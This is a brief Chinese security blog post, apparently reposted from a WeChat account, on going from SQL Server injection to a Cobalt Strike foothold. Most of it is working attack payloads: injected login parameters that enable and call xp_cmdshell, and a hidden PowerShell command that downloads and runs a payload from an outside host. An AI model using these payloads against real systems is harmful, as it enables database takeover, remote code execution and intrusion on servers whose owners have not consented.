Poc:uname=admin';EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE---- &upwd=123123&EngState=1&ident=
Poc:uname=admin';DECLARE @er VARCHAR(8000);SET @er=(需要hex编码一下);EXEC master..xp_cmdshell @er-- &upwd=123123&EngState=1&ident=
此处不知道哪里有问题,网上在线的编码一直有问题,推荐使用小葵编码工具
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10:2112/a'))"
本文始发于微信公众号(NOVASEC):sqlserver注入到cs上线
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论